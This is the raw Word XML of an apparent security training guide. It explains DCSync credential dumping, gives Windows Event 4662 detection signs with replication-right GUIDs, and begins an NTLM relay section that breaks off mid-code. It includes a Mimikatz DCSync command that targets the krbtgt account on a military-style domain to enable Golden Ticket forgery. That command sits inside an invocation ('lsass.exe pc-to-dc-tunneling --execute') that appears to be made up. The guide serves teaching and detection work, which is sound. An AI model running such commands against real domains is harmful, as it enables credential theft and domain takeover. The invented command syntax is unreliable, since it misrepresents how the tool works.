        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B4067B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Offensive Logic: DCSync (Credential Dumping)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A56354" w14:textId="77777777" w:rsidR="00B4067B" w:rsidRPr="00B4067B" w:rsidRDefault="00B4067B" w:rsidP="00B4067B">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5345F1F1" w14:textId="77777777" w:rsidR="00B4067B" w:rsidRPr="00B4067B" w:rsidRDefault="00B4067B" w:rsidP="00B4067B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B4067B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>DCSync mimics the behavior of a legitimate Domain Controller. An attacker who has compromised an account with specialized replication privileges (such as Replicating Directory Changes) sends a Directory Replication Service Remote Protocol (MS-DRSR) request to a legitimate Domain Controller to extract password hashes without running code on the DC itself.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D5F9DB7" w14:textId="77777777" w:rsidR="00B4067B" w:rsidRPr="00B4067B" w:rsidRDefault="00B4067B" w:rsidP="00B4067B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B4067B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Attacker Execution (Mimikatz Interface)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1832564A" w14:textId="77777777" w:rsidR="00B4067B" w:rsidRDefault="00B4067B" w:rsidP="00B4067B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B4067B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">From a standard, non-domain controller workstation, an attacker leveraging high-privilege credentials bypasses standard directory access controls to target the </w:t>
      </w:r>
      <w:r w:rsidRPr="00B4067B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>krbtgt</w:t>
      </w:r>
      <w:r w:rsidRPr="00B4067B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> account hash:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17A7DE7C" w14:textId="77777777" w:rsidR="00B4067B" w:rsidRPr="00B4067B" w:rsidRDefault="00B4067B" w:rsidP="00B4067B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49F1BB88" w14:textId="77777777" w:rsidR="00B4067B" w:rsidRDefault="00B4067B">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="444444"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68880615" w14:textId="455E33B0" w:rsidR="00B4067B" w:rsidRPr="00B4067B" w:rsidRDefault="00B4067B">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="880000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B4067B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t># Attacker triggers remote replication protocol targeting the domain controller</w:t>
      </w:r>
      <w:r w:rsidRPr="00B4067B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00B4067B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>lsass.</w:t>
      </w:r>
      <w:r w:rsidRPr="00B4067B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00B4067B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B4067B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>pc</w:t>
      </w:r>
      <w:r w:rsidRPr="00B4067B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00B4067B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r w:rsidRPr="00B4067B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>-dc-tunneling --</w:t>
      </w:r>
      <w:r w:rsidRPr="00B4067B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>execute</w:t>
      </w:r>
      <w:r w:rsidRPr="00B4067B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B4067B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="880000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>"lsadump::dcsync /domain:mil-net.mil /user:krbtgt"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="702FDFC5" w14:textId="77777777" w:rsidR="00B4067B" w:rsidRDefault="00B4067B">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BBC83E3" w14:textId="58059092" w:rsidR="00B4067B" w:rsidRPr="00B4067B" w:rsidRDefault="00B4067B" w:rsidP="00B4067B"/>
    <w:p w14:paraId="0BEC20D6" w14:textId="77777777" w:rsidR="00B4067B" w:rsidRPr="00B4067B" w:rsidRDefault="00B4067B" w:rsidP="00B4067B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B4067B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The Domain Controller responds with the raw NTLM hash and history of the krbtgt account, which the attacker uses to forge a Golden Ticket.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB4564E" w14:textId="77777777" w:rsidR="00B4067B" w:rsidRPr="00B4067B" w:rsidRDefault="00B4067B" w:rsidP="00B4067B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B4067B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Defender Red Flags &amp; TTP Artifacts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE23DFD" w14:textId="77777777" w:rsidR="00B4067B" w:rsidRPr="00B4067B" w:rsidRDefault="00B4067B" w:rsidP="00B4067B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B4067B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Windows Security Event ID 4662</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D5FE0C1" w14:textId="7470E4A7" w:rsidR="00B4067B" w:rsidRPr="00B4067B" w:rsidRDefault="00B4067B" w:rsidP="00B4067B">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B4067B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>An operation was performed on an object:</w:t>
      </w:r>
      <w:r w:rsidRPr="00B4067B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Active Directory logs a read request containing specific extended replication rights.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2878CF87" w14:textId="77777777" w:rsidR="00B4067B" w:rsidRPr="00B4067B" w:rsidRDefault="00B4067B" w:rsidP="00B4067B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B4067B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>The GUID Fingerprint</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="523E0DAD" w14:textId="136BC532" w:rsidR="00B4067B" w:rsidRPr="00B4067B" w:rsidRDefault="00B4067B" w:rsidP="00B4067B">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B4067B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Look for an Event 4662 where the </w:t>
      </w:r>
      <w:r w:rsidRPr="00B4067B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Access Mask</w:t>
      </w:r>
      <w:r w:rsidRPr="00B4067B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is </w:t>
      </w:r>
      <w:r w:rsidRPr="00B4067B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>0x100</w:t>
      </w:r>
      <w:r w:rsidRPr="00B4067B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Control Access) and the </w:t>
      </w:r>
      <w:r w:rsidRPr="00B4067B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Properties/Extended Rights GUID</w:t>
      </w:r>
      <w:r w:rsidRPr="00B4067B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> matches exactly:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BEF9344" w14:textId="77777777" w:rsidR="00B4067B" w:rsidRDefault="00B4067B" w:rsidP="00B4067B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="num" w:pos="1080"/>
        </w:tabs>
        <w:ind w:left="1080"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B4067B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>1131f6aa-9c07-11d1-f79f-00c04fc2dcd2</w:t>
      </w:r>
      <w:r w:rsidRPr="00B4067B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Replicating Directory Changes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E9378E0" w14:textId="1C40C5C3" w:rsidR="00B4067B" w:rsidRPr="00B4067B" w:rsidRDefault="00B4067B" w:rsidP="00B4067B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="num" w:pos="1080"/>
        </w:tabs>
        <w:ind w:left="1080"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B4067B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>1131f6ad-9c07-11d1-f79f-00c04fc2dcd2</w:t>
      </w:r>
      <w:r w:rsidRPr="00B4067B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Replicating Directory Changes All)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BCBE60E" w14:textId="77777777" w:rsidR="00B4067B" w:rsidRPr="00B4067B" w:rsidRDefault="00B4067B" w:rsidP="00B4067B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B4067B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Source Network Location</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A9117AC" w14:textId="4D0B0BAE" w:rsidR="00B4067B" w:rsidRPr="00B4067B" w:rsidRDefault="00B4067B" w:rsidP="00B4067B">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B4067B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Cross-reference the source account/IP address triggering this GUID. If the source IP does not belong to your known, static pool of Domain Controllers, it is an active DCSync intrusion.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B45E358" w14:textId="77777777" w:rsidR="00B4067B" w:rsidRPr="00B4067B" w:rsidRDefault="00B4067B" w:rsidP="00B4067B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B4067B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="28778312">
          <v:rect id="_x0000_i1088" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="432F9A35" w14:textId="77777777" w:rsidR="00B4067B" w:rsidRPr="00B4067B" w:rsidRDefault="00B4067B" w:rsidP="00B4067B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B4067B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>3. Offensive Logic: NTLM Relay Attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F076D4" w14:textId="77777777" w:rsidR="00B4067B" w:rsidRPr="00B4067B" w:rsidRDefault="00B4067B" w:rsidP="00B4067B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B4067B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>During a relay attack, an attacker positions themselves on a local network segment and listens for broadcast name resolution requests (LLMNR / NBT-NS). When a victim machine attempts to locate a non-existent network share, the attacker answers, tricks the victim into authenticating against the attacker's machine, and relays those credentials in real-time to a target server where SMB signing is not required.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="740B5883" w14:textId="77777777" w:rsidR="00B4067B" w:rsidRPr="00B4067B" w:rsidRDefault="00B4067B" w:rsidP="00B4067B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B4067B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Attacker Execution (Python Context)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="724F8DF3" w14:textId="77777777" w:rsidR="00B4067B" w:rsidRDefault="00B4067B" w:rsidP="00B4067B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B4067B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The attacker launches a multi-protocol listener on an internal network subnet to capture incoming name queries and route authentication traffic to an unhardened administrative target host:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BF4BFBA" w14:textId="77777777" w:rsidR="00B4067B" w:rsidRPr="00B4067B" w:rsidRDefault="00B4067B" w:rsidP="00B4067B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C4C996A" w14:textId="77777777" w:rsidR="00B4067B" w:rsidRDefault="00B4067B">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A7965B8" w14:textId="7E401AAF" w:rsidR="00B4067B" w:rsidRDefault="00B4067B">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B4067B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r w:rsidRPr="00B4067B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="880000"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00B4067B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t xml:space="preserve">. Listen </w:t>
      </w:r>
      <w:r w:rsidRPr="00B4067B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>for</w:t>
      </w:r>
      <w:r w:rsidRPr="00B4067B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t xml:space="preserve"> LLMNR broadcast queries </w:t>
      </w:r>
      <w:r w:rsidRPr="00B4067B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>on</w:t>
      </w:r>
      <w:r w:rsidRPr="00B4067B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="444444"/>
